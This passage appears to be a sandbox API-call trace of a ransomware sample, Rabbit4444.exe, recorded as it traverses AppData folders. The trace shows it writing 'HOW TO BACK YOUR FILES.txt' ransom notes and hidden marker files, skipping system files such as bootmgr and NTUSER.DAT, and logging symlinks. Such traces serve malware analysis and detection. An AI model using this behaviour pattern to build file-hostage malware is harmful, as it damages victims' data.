[0054.518] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0054.518] lstrcpyW (in: lpString1=0x130ebaa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.518] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\Search\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\acrobat\\dc\\search\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.518] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.518] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.519] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.519] CloseHandle (hObject=0x278) returned 1 [0054.519] CloseHandle (hObject=0x27c) returned 1 [0054.519] GetCurrentThreadId () returned 0xd98 [0054.519] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6670 [0054.519] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\assets", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\assets") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\assets" [0054.519] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10df68 | out: hHeap=0xe0000) returned 1 [0054.519] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6668 | out: hHeap=0xe0000) returned 1 [0054.519] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\assets" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\assets") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\assets" [0054.519] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\assets", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\assets\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\assets\\" [0054.519] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\assets\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\assets\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\assets\\.BFC0E91B00AE8A0620D3" [0054.519] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\assets\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\acrobat\\dc\\assets\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.520] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.525] FlushFileBuffers (hFile=0x27c) returned 1 [0054.525] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\assets\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.526] CloseHandle (hObject=0x27c) returned 1 [0054.526] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\assets") returned 56 [0054.526] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.526] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\assets\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5a7ce5b7, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5a7ce5b7, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9d23b72, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0054.526] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.526] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.526] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.526] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.526] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5a7ce5b7, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5a7ce5b7, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9d23b72, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.526] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.526] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.526] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.526] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.526] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.527] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9d23b72, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9d23b72, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9d23b72, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.527] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.527] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.527] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9d23b72, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9d23b72, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9d23b72, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0054.527] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0054.527] lstrcpyW (in: lpString1=0x130ebaa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.527] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\DC\\assets\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\acrobat\\dc\\assets\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.527] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.527] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.528] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.528] CloseHandle (hObject=0x278) returned 1 [0054.528] CloseHandle (hObject=0x27c) returned 1 [0054.528] GetCurrentThreadId () returned 0xd98 [0054.528] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6510 [0054.528] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0054.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1150d8 | out: hHeap=0xe0000) returned 1 [0054.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6508 | out: hHeap=0xe0000) returned 1 [0054.528] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local") returned="C:\\Users\\FD1HVy\\AppData\\Local" [0054.528] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\" [0054.528] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\.BFC0E91B00AE8A0620D3" [0054.528] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.529] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.532] FlushFileBuffers (hFile=0x27c) returned 1 [0054.533] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.533] CloseHandle (hObject=0x27c) returned 1 [0054.534] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local") returned 29 [0054.534] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.534] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xd6a9d454, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xe9d23b72, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1028d0 [0054.534] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.534] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.534] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.534] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.534] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xd6a9d454, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xe9d23b72, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.534] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.534] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.534] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.534] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.534] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.534] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9d23b72, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9d23b72, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9d49dba, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.534] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.534] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.534] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa96a60b1, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc4462fde, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa96a60b1, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ActiveSync", cAlternateFileName="ACTIVE~1")) returned 1 [0054.534] lstrcmpiW (lpString1="ActiveSync", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.534] lstrcmpiW (lpString1="ActiveSync", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.534] lstrcmpiW (lpString1="ActiveSync", lpString2="Rabbit4444.exe") returned -1 [0054.534] lstrcmpiW (lpString1="ActiveSync", lpString2=".") returned 1 [0054.534] lstrcmpiW (lpString1="ActiveSync", lpString2="..") returned 1 [0054.534] lstrcmpiW (lpString1="ActiveSync", lpString2="windows") returned -1 [0054.534] lstrcmpiW (lpString1="ActiveSync", lpString2="bootmgr") returned -1 [0054.534] lstrcmpiW (lpString1="ActiveSync", lpString2="pagefile.sys") returned -1 [0054.534] lstrcmpiW (lpString1="ActiveSync", lpString2="boot") returned -1 [0054.534] lstrcmpiW (lpString1="ActiveSync", lpString2="ids.txt") returned -1 [0054.535] lstrcmpiW (lpString1="ActiveSync", lpString2="NTUSER.DAT") returned -1 [0054.535] lstrcpyW (in: lpString1=0x130eb74, lpString2="ActiveSync" | out: lpString1="ActiveSync") returned="ActiveSync" [0054.535] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0054.535] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x52) returned 0x115c88 [0054.535] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6610 [0054.535] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x715a3e1e, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x715a3e1e, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x76e74ef1, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0054.535] lstrcmpiW (lpString1="Adobe", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.535] lstrcmpiW (lpString1="Adobe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.535] lstrcmpiW (lpString1="Adobe", lpString2="Rabbit4444.exe") returned -1 [0054.535] lstrcmpiW (lpString1="Adobe", lpString2=".") returned 1 [0054.535] lstrcmpiW (lpString1="Adobe", lpString2="..") returned 1 [0054.535] lstrcmpiW (lpString1="Adobe", lpString2="windows") returned -1 [0054.535] lstrcmpiW (lpString1="Adobe", lpString2="bootmgr") returned -1 [0054.535] lstrcmpiW (lpString1="Adobe", lpString2="pagefile.sys") returned -1 [0054.535] lstrcmpiW (lpString1="Adobe", lpString2="boot") returned -1 [0054.535] lstrcmpiW (lpString1="Adobe", lpString2="ids.txt") returned -1 [0054.535] lstrcmpiW (lpString1="Adobe", lpString2="NTUSER.DAT") returned -1 [0054.535] lstrcpyW (in: lpString1=0x130eb74, lpString2="Adobe" | out: lpString1="Adobe") returned="Adobe" [0054.535] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf63e8 [0054.535] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x48) returned 0x10b470 [0054.535] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf63f0 | out: ListHead=0xf68b0, ListEntry=0xf63f0) returned 0xf6350 [0054.535] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0054.535] lstrcmpiW (lpString1="Application Data", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.535] lstrcmpiW (lpString1="Application Data", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.535] lstrcmpiW (lpString1="Application Data", lpString2="Rabbit4444.exe") returned -1 [0054.535] lstrcmpiW (lpString1="Application Data", lpString2=".") returned 1 [0054.535] lstrcmpiW (lpString1="Application Data", lpString2="..") returned 1 [0054.535] lstrcmpiW (lpString1="Application Data", lpString2="windows") returned -1 [0054.535] lstrcmpiW (lpString1="Application Data", lpString2="bootmgr") returned -1 [0054.535] lstrcmpiW (lpString1="Application Data", lpString2="pagefile.sys") returned -1 [0054.535] lstrcmpiW (lpString1="Application Data", lpString2="boot") returned -1 [0054.535] lstrcmpiW (lpString1="Application Data", lpString2="ids.txt") returned -1 [0054.535] lstrcmpiW (lpString1="Application Data", lpString2="NTUSER.DAT") returned -1 [0054.535] lstrcpyW (in: lpString1=0x130eb74, lpString2="Application Data" | out: lpString1="Application Data") returned="Application Data" [0054.536] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Application Data", dwFileAttributes=0x2412) returned 1 [0054.536] wsprintfA (in: param_1=0x130e338, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\AppData\\Local\\Application Data\r\n") returned 65 [0054.536] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\FD1HVy\\AppData\\Local\\Application Data\r\n") returned 65 [0054.536] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.536] SetFilePointer (in: hFile=0x278, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9ed [0054.536] WriteFile (in: hFile=0x278, lpBuffer=0x130e338*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x130daf4, lpOverlapped=0x0 | out: lpBuffer=0x130e338*, lpNumberOfBytesWritten=0x130daf4*=0x41, lpOverlapped=0x0) returned 1 [0054.538] CloseHandle (hObject=0x278) returned 1 [0054.539] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd6a9d454, ftCreationTime.dwHighDateTime=0x1d35e03, ftLastAccessTime.dwLowDateTime=0xd6a9d454, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xd6a9d454, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CEF", cAlternateFileName="")) returned 1 [0054.539] lstrcmpiW (lpString1="CEF", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.539] lstrcmpiW (lpString1="CEF", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.539] lstrcmpiW (lpString1="CEF", lpString2="Rabbit4444.exe") returned -1 [0054.539] lstrcmpiW (lpString1="CEF", lpString2=".") returned 1 [0054.539] lstrcmpiW (lpString1="CEF", lpString2="..") returned 1 [0054.539] lstrcmpiW (lpString1="CEF", lpString2="windows") returned -1 [0054.539] lstrcmpiW (lpString1="CEF", lpString2="bootmgr") returned 1 [0054.539] lstrcmpiW (lpString1="CEF", lpString2="pagefile.sys") returned -1 [0054.539] lstrcmpiW (lpString1="CEF", lpString2="boot") returned 1 [0054.539] lstrcmpiW (lpString1="CEF", lpString2="ids.txt") returned -1 [0054.539] lstrcmpiW (lpString1="CEF", lpString2="NTUSER.DAT") returned -1 [0054.539] lstrcpyW (in: lpString1=0x130eb74, lpString2="CEF" | out: lpString1="CEF") returned="CEF" [0054.539] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6368 [0054.539] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x44) returned 0x10b510 [0054.539] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6370 | out: ListHead=0xf68b0, ListEntry=0xf6370) returned 0xf63f0 [0054.539] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x46a165bd, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xc46ec579, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x476c0de7, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1 [0054.539] lstrcmpiW (lpString1="Comms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.539] lstrcmpiW (lpString1="Comms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.539] lstrcmpiW (lpString1="Comms", lpString2="Rabbit4444.exe") returned -1 [0054.539] lstrcmpiW (lpString1="Comms", lpString2=".") returned 1 [0054.539] lstrcmpiW (lpString1="Comms", lpString2="..") returned 1 [0054.539] lstrcmpiW (lpString1="Comms", lpString2="windows") returned -1 [0054.539] lstrcmpiW (lpString1="Comms", lpString2="bootmgr") returned 1 [0054.539] lstrcmpiW (lpString1="Comms", lpString2="pagefile.sys") returned -1 [0054.539] lstrcmpiW (lpString1="Comms", lpString2="boot") returned 1 [0054.539] lstrcmpiW (lpString1="Comms", lpString2="ids.txt") returned -1 [0054.539] lstrcmpiW (lpString1="Comms", lpString2="NTUSER.DAT") returned -1 [0054.539] lstrcpyW (in: lpString1=0x130eb74, lpString2="Comms" | out: lpString1="Comms") returned="Comms" [0054.539] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6548 [0054.539] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x48) returned 0x10b3d0 [0054.539] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6550 | out: ListHead=0xf68b0, ListEntry=0xf6550) returned 0xf6370 [0054.539] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc58b9bba, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc58b9bba, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc58b9bba, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ConnectedDevicesPlatform", cAlternateFileName="CONNEC~1")) returned 1 [0054.540] lstrcmpiW (lpString1="ConnectedDevicesPlatform", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.540] lstrcmpiW (lpString1="ConnectedDevicesPlatform", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.540] lstrcmpiW (lpString1="ConnectedDevicesPlatform", lpString2="Rabbit4444.exe") returned -1 [0054.540] lstrcmpiW (lpString1="ConnectedDevicesPlatform", lpString2=".") returned 1 [0054.540] lstrcmpiW (lpString1="ConnectedDevicesPlatform", lpString2="..") returned 1 [0054.540] lstrcmpiW (lpString1="ConnectedDevicesPlatform", lpString2="windows") returned -1 [0054.540] lstrcmpiW (lpString1="ConnectedDevicesPlatform", lpString2="bootmgr") returned 1 [0054.540] lstrcmpiW (lpString1="ConnectedDevicesPlatform", lpString2="pagefile.sys") returned -1 [0054.540] lstrcmpiW (lpString1="ConnectedDevicesPlatform", lpString2="boot") returned 1 [0054.540] lstrcmpiW (lpString1="ConnectedDevicesPlatform", lpString2="ids.txt") returned -1 [0054.540] lstrcmpiW (lpString1="ConnectedDevicesPlatform", lpString2="NTUSER.DAT") returned -1 [0054.540] lstrcpyW (in: lpString1=0x130eb74, lpString2="ConnectedDevicesPlatform" | out: lpString1="ConnectedDevicesPlatform") returned="ConnectedDevicesPlatform" [0054.540] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6668 [0054.540] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x6e) returned 0x117c20 [0054.540] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6670 | out: ListHead=0xf68b0, ListEntry=0xf6670) returned 0xf6550 [0054.540] FindNextFileW (in: hFindFile=0x1028d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xadb6a93, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4a3bd622, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x7e3bdb64, ftLastWriteTime.dwHighDateTime=0x1d327cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Google", cAlternateFileName="")) returned 1 [0054.540] lstrcmpiW (lpString1="Google", 